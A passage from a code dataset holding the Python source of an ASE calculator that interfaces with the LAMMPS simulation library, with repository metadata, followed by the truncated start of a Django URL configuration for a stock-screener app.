"api_name": "darkn... |
37016298011 | """ASE LAMMPS Calculator Library Version"""
from __future__ import print_function
import os
import ctypes
import operator
import sys
import numpy as np
from numpy.linalg import norm
from lammps import lammps
from ase.calculators.calculator import Calculator
from ase.data import atomic_masses
from ase.atoms import symbols2numbers
import ase.units
import re
# TODO
# 1. should we make a new lammps object each time ?
# 2. upper triangular test does not look good
# 3. lmp object is not closed
# 4. need a routine to get the model back from lammps
# 5. if we send a command to lmps directly then the calculator does
# not know about it and the energy could be wrong.
# 6. do we need a subroutine generator that converts a lammps string
# into a python function that can be called
def is_upper_triangular(mat):
"""test if 3x3 matrix is upper triangular"""
def near0(x):
"""Test if a float is within .00001 of 0"""
return abs(x) < 0.00001
return near0(mat[1, 0]) and near0(mat[2, 0]) and near0(mat[2, 1])
def convert_cell(ase_cell):
"""
Convert a parallel piped (forming right hand basis)
to lower triangular matrix LAMMPS can accept. This
function transposes cell matrix so the bases are column vectors
"""
cell = np.matrix.transpose(ase_cell[:,:])
if not is_upper_triangular(cell) or cell[0,0] < 0.0 or cell[1,1] < 0.0 or cell[2,2] < 0.0:
# rotate bases into triangular matrix
tri_mat = np.zeros((3, 3))
A = cell[:, 0]
B = cell[:, 1]
C = cell[:, 2]
tri_mat[0, 0] = norm(A)
Ahat = A / norm(A)
AxBhat = np.cross(A, B) / norm(np.cross(A, B))
tri_mat[0, 1] = np.dot(B, Ahat)
tri_mat[1, 1] = norm(np.cross(Ahat, B))
tri_mat[0, 2] = np.dot(C, Ahat)
tri_mat[1, 2] = np.dot(C, np.cross(AxBhat, Ahat))
tri_mat[2, 2] = norm(np.dot(C, AxBhat))
# create and save the transformation for coordinates
volume = np.linalg.det(ase_cell)
trans = np.array([np.cross(B, C), np.cross(C, A), np.cross(A, B)])
trans = trans / volume
coord_transform = np.dot(tri_mat , trans)
return tri_mat, coord_transform
else:
return cell, None
lammps_real = {
"mass" : 0.001 * ase.units.kg / ase.units.mol,
"distance" : ase.units.Angstrom,
"time" : ase.units.fs,
"energy" : ase.units.kcal/ase.units.mol,
"velocity": ase.units.Angstrom / ase.units.fs,
"force": ase.units.kcal/ase.units.mol/ase.units.Angstrom,
"pressure" : 101325 * ase.units.Pascal
}
lammps_metal = {
"mass" : 0.001 * ase.units.kg / ase.units.mol,
"distance" : ase.units.Angstrom,
"time" : 1e-12 * ase.units.second,
"energy" : ase.units.eV,
"velocity": ase.units.Angstrom / (1e-12*ase.units.second),
"force": ase.units.eV/ase.units.Angstrom,
"pressure" : 1e5 * ase.units.Pascal
}
lammps_units={"real":lammps_real,
"metal":lammps_metal}
def unit_convert(quantity, units='metal'):
try:
return lammps_units[units][quantity]
except:
raise NotImplementedError("Unit {} in unit system {} is not implemented.".format(quantity,units))
class LAMMPSlib(Calculator):
r"""
LAMMPSlib Interface Documentation
**Introduction**
LAMMPSlib is an interface and calculator for LAMMPS_. LAMMPSlib uses
the python interface that comes with LAMMPS to solve an atoms model
for energy, atom forces and cell stress. This calculator creates a
'.lmp' object which is a running lammps program, so further commands
can be sent to this object executed until it is explicitly closed. Any
additional variables calculated by lammps can also be extracted. This
is still experimental code.
**Arguments**
================= ==========================================================
Keyword Description
================= ==========================================================
``lmpcmds`` list of strings of LAMMPS commands. You need to supply
enough to define the potential to be used e.g.
["pair_style eam/alloy",
"pair_coeff * * potentials/NiAlH_jea.eam.alloy Ni Al"]
``atom_types`` dictionary of "atomic_symbol":lammps_atom_type pairs,
e.g. {'Cu':1} to bind copper to lammps atom type 1.
Default method assigns lammps atom types in order that they
appear in the atoms model. Mandatory.
``log_file`` string
path to the desired LAMMPS log file
``lammps_header`` string to use for lammps setup. Default is to use
metal units and simple atom simulation.
lammps_header=['units metal',
'atom_style atomic',
'atom_modify map array sort 0 0'])
``keep_alive`` Boolean
whether to keep the lammps routine alive for more commands
================= ==========================================================
**Requirements**
To run this calculator you must have LAMMPS installed and compiled to
enable the python interface. See the LAMMPS manual.
If the following code runs then lammps is installed correctly.
>>> from lammps import lammps
>>> lmp = lammps()
The version of LAMMPS is also important. LAMMPSlib is suitable for
versions after approximately 2011. Prior to this the python interface
is slightly different from that used by LAMMPSlib. It is not difficult
to change to the earlier format.
**LAMMPS and LAMMPSlib**
The LAMMPS calculator is another calculator that uses LAMMPS (the
program) to calculate the energy by generating input files and running
a separate LAMMPS job to perform the analysis. The output data is then
read back into python. LAMMPSlib makes direct use of the LAMMPS (the
program) python interface. As well as directly running any LAMMPS
comand line it allows the values of any of LAMMPS variables to be
extracted and returned to python.
**Example**
::
from ase import Atom, Atoms
from lammpslib import LAMMPSlib
cmds = ["pair_style eam/alloy",
"pair_coeff * * NiAlH_jea.eam.alloy Al H"]
a = 4.05
al = Atoms([Atom('Al')], cell=(a, a, a), pbc=True)
h = Atom([Atom('H')])
alh = al + h
lammps = LAMMPSlib(lmpcmds = cmds, logfile='test.log')
alh.set_calculator(lammps)
print "Energy ", alh.get_potential_energy()
**Implementation**
LAMMPS provides a set of python functions to allow execution of the
underlying C++ LAMMPS code. The functions used by the LAMMPSlib
interface are::
from lammps import lammps
lmp = lammps(cmd_args) # initiate LAMMPS object with command line args
lmp.scatter_atoms('x',1,3,positions) # atom coords to LAMMPS C array
lmp.command(cmd) # executes a one line cmd string
lmp.extract_variable(...) # extracts a per atom variable
lmp.extract_global(...) # extracts a global variable
lmp.close() # close the lammps object
For a single atom model the following lammps file commands would be run
by invoking the get_potential_energy() method::
units metal
atom_style atomic
atom_modify map array sort 0 0
region cell prism 0 xhi 0 yhi 0 zhi xy xz yz units box
create_box 1 cell
create_atoms 1 single 0 0 0 units box
mass * 1.0
## user lmpcmds get executed here
pair_style eam/alloy
pair_coeff * * lammps/potentials/NiAlH_jea.eam.alloy Al
## end of user lmmpcmds
run 0
**Notes**
.. _LAMMPS: http://lammps.sandia.gov/
* Units: The default lammps_header sets the units to Angstrom and eV
and for compatibility with ASE Stress is in GPa.
* The global energy is currently extracted from LAMMPS using
extract_variable since lammps.lammps currently extract_global only
accepts the following ['dt', 'boxxlo', 'boxxhi', 'boxylo', 'boxyhi',
'boxzlo', 'boxzhi', 'natoms', 'nlocal'].
* If an error occurs while lammps is in control it will crash
Python. Check the output of the log file to find the lammps error.
* If the are commands direfctly sent to the LAMMPS object this may
change the energy value of the model. However the calculator will not
know of it and still return the original energy value.
End LAMMPSlib Interface Documentation
"""
implemented_properties = ['energy', 'forces', 'stress']
#NB
started = False
initialized = False
default_parameters = dict(
atom_types=None,
log_file=None,
lammps_name='',
keep_alive=False,
lammps_header=['units metal',
'atom_style atomic',
'atom_modify map array sort 0 0'],
boundary=True,
create_box=True,
create_atoms=True,
read_molecular_info=False,
comm=None)
def parse_bonds(self, atoms):
atoms.bonds = []
atoms.max_n_bonds = 0
for i in range(len(atoms)):
if atoms.arrays['bonds'][i] != '_':
n_bonds = 0
for bond_list in atoms.arrays['bonds'][i].split(','):
n_bonds += 1
m = re.match('(\d+)\((\d+)\)',bond_list)
atoms.bonds.append((int(m.group(2)),i+1,int(m.group(1))+1))
atoms.max_n_bonds = max(atoms.max_n_bonds, n_bonds)
def set_bonds(self, atoms):
for (t, i1, i2) in atoms.bonds:
self.lmp.command('create_bonds single/bond {} {} {} '.format(t, i1, i2))
def parse_angles(self, atoms):
atoms.angles = []
atoms.max_n_angles = 0
for i in range(len(atoms)):
if atoms.arrays['angles'][i] != '_':
n_angles = 0
for angle_list in atoms.arrays['angles'][i].split(','):
n_angles += 1
m = re.match('(\d+)\-(\d+)\((\d+)\)',angle_list)
atoms.angles.append((int(m.group(3)),int(m.group(1))+1,i+1,int(m.group(2))+1))
atoms.max_n_angles = max(atoms.max_n_angles, n_angles)
def set_angles(self, atoms):
for (t, i1, i2, i3) in atoms.angles:
self.lmp.command('create_bonds single/angle {} {} {} {}'.format(t, i1, i2, i3))
def parse_dihedrals(self,atoms):
atoms.dihedrals = []
atoms.max_n_dihedrals = 0
for i in range(len(atoms)):
if atoms.arrays['dihedrals'][i] != '_':
n_dihedrals = 0
for dihedral_list in atoms.arrays['dihedrals'][i].split(','):
n_dihedrals += 1
m = re.match('(\d+)\-(\d+)\-(\d+)\((\d+)\)',dihedral_list)
atoms.dihedrals.append((int(m.group(4)),i+1,int(m.group(1))+1,int(m.group(2))+1,int(m.group(3))+1))
atoms.max_n_dihedrals = max(atoms.max_n_dihedrals, n_dihedrals)
def set_dihedrals(self, atoms):
for (t, i1, i2, i3, i4) in atoms.dihedrals:
self.lmp.command('create_bonds single/dihedral {} {} {} {} {}'.format(t, i1, i2, i3, i4))
def parse_impropers(self,atoms):
atoms.impropers = []
atoms.max_n_impropers = 0
for i in range(len(atoms)):
if atoms.arrays['impropers'][i] != '_':
n_impropers = 0
for improper_list in atoms.arrays['impropers'][i].split(','):
n_impropers += 1
m = re.match('(\d+)\-(\d+)\-(\d+)\((\d+)\)',improper_list)
atoms.impropers.append((int(m.group(4)),i+1,int(m.group(1))+1,int(m.group(2))+1,int(m.group(3))+1))
atoms.max_n_impropers = max(atoms.max_n_impropers, n_impropers)
def set_impropers(self, atoms):
for (t, i1, i2, i3, i4) in atoms.impropers:
self.lmp.command('create_improper {} {} {} {} {}'.format(t, i1, i2, i3, i4))
def set_charges(self, atoms):
for i,j in enumerate(atoms.arrays['mmcharge']):
self.lmp.command('set atom {} charge {} '.format(i+1,j))
def set_cell(self, atoms, change=False):
lammps_cell, self.coord_transform = convert_cell(atoms.get_cell())
xhi = lammps_cell[0, 0]
yhi = lammps_cell[1, 1]
zhi = lammps_cell[2, 2]
xy = lammps_cell[0, 1]
xz = lammps_cell[0, 2]
yz = lammps_cell[1, 2]
if change:
cell_cmd = 'change_box all x final 0 {} y final 0 {} z final 0 {} xy final {} xz final {} yz final {}'\
.format(xhi, yhi, zhi, xy, xz, yz)
else:
# just in case we'll want to run with a funny shape box, and here command will only happen once, and before any calculation
if self.parameters.create_box:
self.lmp.command('box tilt large')
cell_cmd = 'region cell prism 0 {} 0 {} 0 {} {} {} {} units box'\
.format(xhi, yhi, zhi, xy, xz, yz)
self.lmp.command(cell_cmd)
def set_lammps_pos(self, atoms):
pos = atoms.get_positions() / unit_convert("distance", self.units)
# If necessary, transform the positions to new coordinate system
if self.coord_transform is not None:
pos = np.dot(self.coord_transform , np.matrix.transpose(pos))
pos = np.matrix.transpose(pos)
# Convert ase position matrix to lammps-style position array
lmp_positions = list(pos.ravel())
# Convert that lammps-style array into a C object
lmp_c_positions =\
(ctypes.c_double * len(lmp_positions))(*lmp_positions)
# self.lmp.put_coosrds(lmp_c_positions)
self.lmp.scatter_atoms('x', 1, 3, lmp_c_positions)
def calculate(self, atoms, properties, system_changes):
self.propagate(atoms, properties, system_changes, 0)
def propagate(self, atoms, properties, system_changes, n_steps, dt=None,
dt_not_real_time=False, velocity_field=None):
""""atoms: Atoms object
Contains positions, unit-cell, ...
properties: list of str
List of what needs to be calculated. Can be any combination
of 'energy', 'forces', 'stress', 'dipole', 'charges', 'magmom'
and 'magmoms'.
system_changes: list of str
List of what has changed since last calculation. Can be
any combination of these five: 'positions', 'numbers', 'cell',
'pbc', 'charges' and 'magmoms'.
"""
if len(system_changes) == 0:
return
self.coord_transform = None
if not self.started:
self.start_lammps()
########################################################################
# NB
if not self.initialized:
self.initialise_lammps(atoms)
else: # Still need to reset cell
# Reset positions so that if they are crazy from last propagation,
# change_box (in set_cell()) won't hang.
# Could do this only after testing for crazy positions?
# Could also use scatter_atoms() to set values (requires MPI comm),
# or extra_atoms() to get pointers to local data structures to zero,
# but then will have to be careful with parallelism
self.lmp.command("set atom * x 0.0 y 0.0 z 0.0")
self.set_cell(atoms, change=True)
if self.parameters.atom_types is None:
raise NameError("atom_types are mandatory.")
do_rebuild = False
do_redo_atom_types = False
try:
do_rebuild = (len(atoms.numbers) != len(self.previous_atoms_numbers)) or ("numbers" in system_changes)
if not do_rebuild:
do_redo_atom_types = (
atoms.numbers != self.previous_atoms_numbers).any()
except Exception:
pass
self.lmp.command('echo none') # don't echo the atom positions
if do_rebuild:
self.rebuild(atoms)
elif do_redo_atom_types:
self.redo_atom_types(atoms)
self.lmp.command('echo log') # switch back log
self.set_lammps_pos(atoms)
if n_steps > 0: # TODO: here are velocities passed onto LAMMPS
if velocity_field is None:
vel = atoms.get_velocities() / unit_convert("velocity",
self.units)
else:
vel = atoms.arrays[velocity_field]
# If necessary, transform the velocities to new coordinate system
if self.coord_transform is not None:
vel = np.dot(self.coord_transform, np.matrix.transpose(vel))
vel = np.matrix.transpose(vel)
# Convert ase velocities matrix to lammps-style velocities array
lmp_velocities = list(vel.ravel())
# Convert that lammps-style array into a C object
lmp_c_velocities =\
(ctypes.c_double * len(lmp_velocities))(*lmp_velocities)
# self.lmp.put_coords(lmp_c_velocities)
self.lmp.scatter_atoms('v', 1, 3, lmp_c_velocities)
# Keep atoms fixed
# # RY: use LAMMPS_init_cmds to set up NVE,
# # e.g. group fixed id <= X; group mobile id > X; fix 1 mobile nve
# keep_atoms_fixed = int(sum([x == 0 for x in lmp_velocities]) / 3)
# if keep_atoms_fixed > 0:
# self.lmp.command("group fixed id <= " + str(keep_atoms_fixed))
# self.lmp.command("group mobile id > " + str(keep_atoms_fixed))
#self.lmp.command("fix freeze fixed setforce 0.0 0.0 0.0")
#if atoms.info["set_wall"]:
# self.lmp.command("fix walls all wall/reflect zlo 0 zhi "
# + str(atoms.cell[2, 2]) + " units box")
# TODO: if we fix forces here, then it should be passed on, just
# pass on keep_atoms_fixed
# TODO: if you have atoms with EXACTLY zero velocities, then freeze
# them
# TODO: keep_atoms_fixed = 0 for potential energy calculations of the
# initial configurations
# Run for 0 time to calculate
if dt is not None:
if dt_not_real_time:
self.lmp.command('timestep %.30f' % dt)
else:
self.lmp.command('timestep %.30f' % ( dt/unit_convert("time", self.units)) )
self.lmp.command('run %d' % n_steps)
if n_steps > 0:
# TODO this must be slower than native copy, but why is it broken?
pos = np.array([x for x in self.lmp.gather_atoms("x",1,3)]).reshape(-1,3)
if self.coord_transform is not None:
pos = np.dot(pos, self.coord_transform)
atoms.set_positions(pos * unit_convert("distance", self.units))
vel = np.array([v for v in self.lmp.gather_atoms("v",1,3)]).reshape(-1,3)
if self.coord_transform is not None:
vel = np.dot(vel, self.coord_transform)
if velocity_field is None:
atoms.set_velocities(vel * unit_convert("velocity", self.units))
if velocity_field is not None:
nreflects = self.lmp.extract_fix('1',0,1,0)
atoms.info['nreflects'] = nreflects
nreversals = self.lmp.extract_fix('1',0,1,1)
atoms.info['nreversals'] = nreversals
# Extract the forces and energy
# if 'energy' in properties:
self.results['energy'] = self.lmp.extract_variable('pe', None, 0) * unit_convert("energy", self.units)
# self.results['energy'] = self.lmp.extract_global('pe', 0)
# if 'stress' in properties:
stress = np.empty(6)
# stress_vars = ['pxx', 'pyy', 'pzz', 'pxy', 'pxz', 'pyz']
stress_vars = ['pxx', 'pyy', 'pzz', 'pyz', 'pxz', 'pxy']
for i, var in enumerate(stress_vars):
stress[i] = self.lmp.extract_variable(var, None, 0)
stress_mat = np.zeros( (3,3) )
stress_mat[0,0] = stress[0]
stress_mat[1,1] = stress[1]
stress_mat[2,2] = stress[2]
stress_mat[1,2] = stress[3]
stress_mat[2,1] = stress[3]
stress_mat[0,2] = stress[4]
stress_mat[2,0] = stress[4]
stress_mat[0,1] = stress[5]
stress_mat[1,0] = stress[5]
if self.coord_transform is not None:
stress_mat = np.dot(self.coord_transform.T, np.dot(stress_mat, self.coord_transform))
stress[0] = stress_mat[0,0]
stress[1] = stress_mat[1,1]
stress[2] = stress_mat[2,2]
stress[3] = stress_mat[1,2]
stress[4] = stress_mat[0,2]
stress[5] = stress_mat[0,1]
self.results['stress'] = stress * (-unit_convert("pressure", self.units))
# if 'forces' in properties:
f = np.zeros((len(atoms), 3)) # TODO: sets forces, doesn't update them
f[:,:] = np.array([x for x in self.lmp.gather_atoms("f",1,3)]).reshape(-1,3)
f *= unit_convert("force", self.units)
if self.coord_transform is not None:
self.results['forces'] = np.dot(f, self.coord_transform)
else:
self.results['forces'] = f.copy()
if not self.parameters.keep_alive:
self.lmp.close()
def lammpsbc(self, pbc, fix):
if pbc:
return 'p'
elif fix:
return 'f'
else:
return 's'
def rebuild(self,atoms):
try:
n_diff = len(atoms.numbers) - len(self.previous_atoms_numbers)
except:
n_diff = len(atoms.numbers)
if n_diff > 0:
if any([("reax/c" in cmd) for cmd in self.parameters.lmpcmds]):
self.lmp.command("pair_style lj/cut 2.5")
self.lmp.command("pair_coeff * * 1 1")
for cmd in self.parameters.lmpcmds:
if ("pair_style" in cmd) or ("pair_coeff" in cmd):
self.lmp.command(cmd)
cmd = "create_atoms 1 random {} 1 NULL".format(n_diff)
self.lmp.command(cmd)
elif n_diff < 0:
cmd = "group delatoms id {}:{}".format(len(atoms.numbers)+1,len(self.previous_atoms_numbers))
self.lmp.command(cmd)
cmd = "delete_atoms group delatoms"
self.lmp.command(cmd)
self.redo_atom_types(atoms)
def redo_atom_types(self,atoms):
if self.parameters.atom_types_equal_atomic_numbers:
current_types = { (i+1,Z) for i,Z in enumerate( atoms.get_atomic_numbers() ) }
else:
current_types = { (i+1,self.parameters.atom_types[Z]) for i,Z in enumerate( atoms.get_atomic_numbers() ) }
try:
if self.parameters.atom_types_equal_atomic_numbers:
previous_types = { (i+1,Z)
for i,Z in enumerate( self.previous_atoms_numbers ) }
else:
previous_types = { (i+1,self.parameters.atom_types[Z])
for i,Z in enumerate( self.previous_atoms_numbers ) }
except:
previous_types = set()
for (i,i_type) in current_types - previous_types:
cmd = "set atom {} type {}".format(i,i_type)
self.lmp.command(cmd)
self.previous_atoms_numbers = atoms.numbers.copy()
def restart_lammps(self, atoms):
if self.started:
self.lmp.command("clear")
# hope there's no other state to be reset
self.started=False
self.initialized=False
self.previous_atoms_numbers = []
self.start_lammps()
self.initialise_lammps(atoms)
def start_lammps(self):
# start lammps process
if self.parameters.log_file is None:
cmd_args = ['-echo', 'log', '-log', 'none', '-screen', 'none', '-nocite']
else:
cmd_args = ['-echo', 'log', '-log', self.parameters.log_file,
'-screen', 'none','-nocite']
self.cmd_args = cmd_args
if not hasattr(self, 'lmp'):
self.lmp = lammps(self.parameters.lammps_name, self.cmd_args, comm=self.parameters.comm)
# Use metal units: Angstrom, ps, and eV
for cmd in self.parameters.lammps_header:
self.lmp.command(cmd)
for cmd in self.parameters.lammps_header:
if "units" in cmd:
self.units = cmd.split()[1]
if hasattr(self.parameters, "lammps_header_extra") and self.parameters.lammps_header_extra is not None:
for cmd in self.parameters.lammps_header_extra:
self.lmp.command(cmd)
self.started=True
def initialise_lammps(self, atoms):
# Initialising commands
if self.parameters.boundary:
# if the boundary command is in the supplied commands use that
# otherwise use atoms pbc
pbc = atoms.get_pbc()
for cmd in self.parameters.lmpcmds:
if 'boundary' in cmd:
break
else:
fix = False
# TODO: RBW – quick fix so that boundary parallel to surface
# is not shrink wrapped
# if "set_wall" in atoms.info.keys():
# fix = True
self.lmp.command('boundary ' + ' '.join([self.lammpsbc(bc, fix)
for bc in pbc]))
# Initialize cell
self.set_cell(atoms, change=not self.parameters.create_box)
if self.parameters.atom_types is None:
raise NameError("atom_types are mandatory.")
if isinstance(self.parameters.atom_types,dict):
# atom_types is a dictionary with symbols (or numbers) as keys
self.parameters.atom_types_equal_atomic_numbers = False
symbol_atom_types = self.parameters.atom_types.copy()
self.parameters.atom_types = {}
for sym in symbol_atom_types:
try:
num = int(sym)
except:
num = symbols2numbers(sym)[0]
self.parameters.atom_types[num] = symbol_atom_types[sym]
else: # not a dict, must be the string TYPE_EQUALS_Z
if self.parameters.atom_types == "TYPE_EQUALS_Z":
self.parameters.atom_types_equal_atomic_numbers = True
self.parameters.atom_types = {}
for Z in atoms.get_atomic_numbers():
self.parameters.atom_types[Z] = Z
else:
raise ValueError('atom_types parameter "%s" is string, but not TYPE_EQUALS_Z' % self.parameters.atom_types)
# Collect chemical symbols
symbols = np.asarray(atoms.get_chemical_symbols())
numbers = np.asarray(atoms.get_atomic_numbers())
# Initialize box
if self.parameters.create_box:
# count number of known types
n_types = len(self.parameters.atom_types)
create_box_command = 'create_box {} cell'.format(n_types)
# count numbers of bonds and angles defined by potential
n_dihedral_types = 0
n_improper_types = 0
n_angle_types = 0
n_bond_types = 0
for cmd in self.parameters.lmpcmds:
m = re.match('\s*angle_coeff\s+(\d+)', cmd)
if m is not None:
n_angle_types = max(int(m.group(1)), n_angle_types)
m = re.match('\s*bond_coeff\s+(\d+)', cmd)
if m is not None:
n_bond_types = max(int(m.group(1)), n_bond_types)
m = re.match('\s*dihedral_coeff\s+(\d+)', cmd)
if m is not None:
n_dihedral_types = max(int(m.group(1)), n_dihedral_types)
m = re.match('\s*improper_coeff\s+(\d+)', cmd)
if m is not None:
n_improper_types = max(int(m.group(1)), n_improper_types)
if self.parameters.read_molecular_info:
if 'bonds' in atoms.arrays:
self.parse_bonds(atoms)
create_box_command += ' bond/types {} extra/bond/per/atom {}'.format(n_bond_types,atoms.max_n_bonds)
if 'angles' in atoms.arrays:
self.parse_angles(atoms)
create_box_command += ' angle/types {} extra/angle/per/atom {}'.format(n_angle_types,atoms.max_n_angles)
if 'dihedrals' in atoms.arrays:
self.parse_dihedrals(atoms)
create_box_command += ' dihedral/types {} extra/dihedral/per/atom {}'.format(n_dihedral_types,atoms.max_n_dihedrals)
if 'impropers' in atoms.arrays:
self.parse_impropers(atoms)
create_box_command += ' improper/types {} extra/improper/per/atom {}'.format(n_improper_types,atoms.max_n_impropers)
self.lmp.command(create_box_command)
# Initialize the atoms with their types
# positions do not matter here
if self.parameters.create_atoms:
self.lmp.command('echo none') # don't echo the atom positions
self.rebuild(atoms)
self.lmp.command('echo log') # turn back on
# execute the user commands
for cmd in self.parameters.lmpcmds:
self.lmp.command(cmd)
# Set masses after user commands, to override EAM provided masses, e.g.
masses = atoms.get_masses()
for Z in self.parameters.atom_types:
in_cur_sys=False
for i in range(len(atoms)):
if numbers[i] == Z:
# convert from amu (ASE) to lammps mass unit)
self.lmp.command('mass %d %.30f' % (self.parameters.atom_types[Z], masses[i] /
unit_convert("mass", self.units) ))
in_cur_sys=True
break
if not in_cur_sys:
self.lmp.command('mass %d %.30f' % (self.parameters.atom_types[Z], 1.0))
# Define force & energy variables for extraction
self.lmp.command('variable pxx equal pxx')
self.lmp.command('variable pyy equal pyy')
self.lmp.command('variable pzz equal pzz')
self.lmp.command('variable pxy equal pxy')
self.lmp.command('variable pxz equal pxz')
self.lmp.command('variable pyz equal pyz')
# I am not sure why we need this next line but LAMMPS will
# raise an error if it is not there. Perhaps it is needed to
# ensure the cell stresses are calculated
self.lmp.command('thermo_style custom pe pxx emol ecoul')
self.lmp.command('variable fx atom fx')
self.lmp.command('variable fy atom fy')
self.lmp.command('variable fz atom fz')
# do we need this if we extract from a global ?
self.lmp.command('variable pe equal pe')
self.lmp.command("neigh_modify delay 0 every 1 check yes")
if self.parameters.read_molecular_info:
# read in bonds if there are bonds from the ase-atoms object if the molecular flag is set
if 'bonds' in atoms.arrays:
self.set_bonds(atoms)
# read in angles if there are angles from the ase-atoms object if the molecular flag is set
if 'angles' in atoms.arrays:
self.set_angles(atoms)
# read in dihedrals if there are dihedrals from the ase-atoms object if the molecular flag is set
if 'dihedrals' in atoms.arrays:
self.set_dihedrals(atoms)
# read in impropers if there are impropers from the ase-atoms object if the molecular flag is set
if 'impropers' in atoms.arrays:
self.set_impropers(atoms)
if self.parameters.read_molecular_info and 'mmcharge' in atoms.arrays:
self.set_charges(atoms)
self.initialized = True
def write_lammps_data(filename, atoms, atom_types, comment=None, cutoff=None,
molecule_ids=None, charges=None, units='metal',
bond_types=None, angle_types=None, dihedral_types=None,
improper_types=None):
if isinstance(filename, basestring):
fh = open(filename, 'w')
else:
fh = filename
if comment is None:
comment = 'lammpslib autogenerated data file'
fh.write(comment.strip() + '\n\n')
fh.write('{0} atoms\n'.format(len(atoms)))
fh.write('{0} atom types\n'.format(len(atom_types)))
if bond_types:
from matscipy.neighbours import neighbour_list
i_list, j_list = neighbour_list('ij', atoms, cutoff)
print('Bonds:')
bonds = []
for bond_type, (Z1, Z2) in enumerate(bond_types):
bond_mask = (atoms.numbers[i_list] == Z1) & (atoms.numbers[j_list] == Z2)
print((Z1, Z2), bond_mask.sum())
for (I, J) in zip(i_list[bond_mask], j_list[bond_mask]):
#NB: LAMMPS uses 1-based indices for bond types and particle indices
bond = (bond_type+1, I+1, J+1)
bonds.append(bond)
print('')
if len(bonds) > 0:
fh.write('{0} bonds\n'.format(len(bonds)))
fh.write('{0} bond types\n'.format(len(bond_types)))
if angle_types:
print('Angles:')
angle_count = { angle : 0 for angle in angle_types }
angles = []
for I in range(len(atoms)):
for J in j_list[i_list == I]:
for K in j_list[i_list == J]:
if J < K:
continue
Zi, Zj, Zk = atoms.numbers[[I, J, K]]
if (Zj, Zi, Zk) in angle_types:
angle = (angle_types.index((Zj, Zi, Zk))+1, J+1, I+1, K+1)
angle_count[(Zj, Zi, Zk)] += 1
angles.append(angle)
for angle in angle_types:
print(angle, angle_count[angle])
print('')
if len(angles) > 0:
fh.write('{0} angles\n'.format(len(angles)))
fh.write('{0} angle types\n'.format(len(angle_types)))
if dihedral_types:
print('Dihedrals:')
dihedral_count = { dihedral : 0 for dihedral in dihedral_types }
dihedrals = []
for I in range(len(atoms)):
for J in j_list[i_list == I]:
for K in j_list[i_list == J]:
for L in j_list[i_list == K]:
Zi, Zj, Zk, Zl = atoms.numbers[[I, J, K, L]]
if (Zi, Zj, Zk, Zl) in dihedral_types:
dihedral = (dihedral_types.index((Zi, Zj, Zk, Zl))+1,
I+1, J+1, K+1, L+1)
dihedral_count[(Zi, Zj, Zk, Zl)] += 1
dihedrals.append(dihedral)
for dihedral in dihedral_types:
print(dihedral, dihedral_count[dihedral])
print('')
if len(dihedrals) > 0:
fh.write('{0} dihedrals\n'.format(len(dihedrals)))
fh.write('{0} dihedral types\n'.format(len(dihedral_types)))
if improper_types:
print('Impropers:')
improper_count = { improper : 0 for improper in improper_types }
impropers = []
for I in range(len(atoms)):
for J in j_list[i_list == I]:
for K in j_list[i_list == J]:
for L in j_list[i_list == K]:
Zi, Zj, Zk, Zl = atoms.numbers[[I, J, K, L]]
if (Zi, Zj, Zk, Zl) in improper_types:
improper = (improper_types.index((Zi, Zj, Zk, Zl))+1,
I+1, J+1, K+1, L+1)
improper_count[(Zi, Zj, Zk, Zl)] += 1
impropers.append(improper)
for improper in improper_types:
print(improper, improper_count[improper])
print('')
if len(impropers) > 0:
fh.write('{0} impropers\n'.format(len(impropers)))
fh.write('{0} improper types\n'.format(len(improper_types)))
fh.write('\n')
cell, coord_transform = convert_cell(atoms.get_cell())
fh.write('{0:16.8e} {1:16.8e} xlo xhi\n'.format(0.0, cell[0, 0]))
fh.write('{0:16.8e} {1:16.8e} ylo yhi\n'.format(0.0, cell[1, 1]))
fh.write('{0:16.8e} {1:16.8e} zlo zhi\n'.format(0.0, cell[2, 2]))
fh.write('{0:16.8e} {1:16.8e} {2:16.8e} xy xz yz\n'.format(cell[0, 1], cell[0, 2], cell[1, 2]))
fh.write('\nMasses\n\n')
sym_mass = {}
masses = atoms.get_masses()
symbols = atoms.get_chemical_symbols()
numbers = atoms.get_atomic_numbers()
for Z in atom_types:
for i in range(len(atoms)):
if numbers[i] == Z:
Z_mass[Z] = masses[i] / unit_convert("mass", units)
break
else:
Z_mass[Z] = atomic_masses[Z] / unit_convert("mass", units)
for (Z, typ) in sorted(atom_types.items(), key=operator.itemgetter(1)):
fh.write('{0} {1}\n'.format(typ, Z_mass[Z]))
fh.write('\nAtoms # full\n\n')
if molecule_ids is None:
molecule_ids = np.zeros(len(atoms), dtype=int)
if charges is None:
charges = atoms.get_initial_charges()
for i, (Z, mol, q, pos) in enumerate(zip(numbers, molecule_ids,
charges, atoms.get_positions())):
typ = atom_types[Z]
fh.write('{0} {1} {2} {3:16.8e} {4:16.8e} {5:16.8e} {6:16.8e}\n'
.format(i+1, mol, typ, q, pos[0], pos[1], pos[2]))
if bond_types and len(bonds) > 0:
fh.write('\nBonds\n\n')
for idx, bond in enumerate(bonds):
fh.write('{0} {1} {2} {3}\n'
.format(*[idx+1] + list(bond)))
if angle_types and len(angles) > 0:
fh.write('\nAngles\n\n')
for idx, angle in enumerate(angles):
fh.write('{0} {1} {2} {3} {4}\n'
.format(*[idx+1] + list(angle)))
if dihedral_types and len(dihedrals) > 0:
fh.write('\nDihedrals\n\n')
for idx, dihedral in enumerate(dihedrals):
fh.write('{0} {1} {2} {3} {4} {5}\n'
.format(*[idx+1] + list(dihedral)))
if improper_types and len(impropers) > 0:
fh.write('\nImpropers\n\n')
for idx, improper in enumerate(impropers):
fh.write('{0} {1} {2} {3} {4} {5}\n'
.format(*[idx+1] + list(improper)))
if isinstance(filename, basestring):
fh.close()
| libAtoms/pymatnest | lammpslib.py | lammpslib.py | py | 38,515 | python | en | code | 26 | github-code | 6 | [
{
"api_name": "numpy.matrix.transpose",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "numpy.matrix",
"line_number": 46,
"usage_type": "attribute"
},
{
"api_name": "numpy.zeros",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "numpy.linalg.nor... |
9152769558 | from django.urls import path
from . import views
urlpatterns = [
path('',views.Home.as_view(),name='Home'),
path(r'stock/<str:Name>',views.Show_Details.as_view()),
path('ajax/get-info',views.get_info),
path('ajax/get-nifty',views.get_nifty),
path('ajax/get-topstocks',views.get_topstocks),
path('stock/ajax/Get-SelectedStock/',views.Get_SelectedStock),
]
| Pggeeks/Live-StockScrenner-Django | stockapp/urls.py | urls.py | py | 379 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "django.urls.path",
"line_number": 4,
"usage_type": "call"
},
{
